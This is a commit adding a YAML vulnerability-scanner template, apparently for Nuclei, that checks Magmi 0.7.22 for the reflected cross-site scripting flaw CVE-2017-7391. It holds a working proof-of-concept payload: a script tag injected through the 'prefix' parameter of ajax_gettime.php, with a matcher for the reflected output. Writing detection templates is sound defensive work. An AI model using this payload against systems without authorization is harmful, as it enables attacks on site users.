Merge pull request #395 from pikpikcu/patch-7

Add Old CVE-2017-7391 Magmi – Cross-Site Scripting
2020-09-03 09:13:28 +05:30 · 2020-09-03 09:13:28 +05:30 · c574e48f1e
parent 206f2655d0 a3f96907fe
commit c574e48f1e
1 changed files with 25 additions and 0 deletions
--- a/cves/CVE-2017-7391.yaml
+++ b/cves/CVE-2017-7391.yaml
@ -0,0 +1,25 @@
+id: CVE-2017-7391
+
+info:
+  name: Magmi – Cross-Site Scripting v.0.7.22
+  author: pikpikcu
+  severity: medium
+  description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
+
+  # Issues:-https://github.com/dweeves/magmi-git/issues/522
+  # Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - '"><script>alert(document.domain);</script><'
+        part: body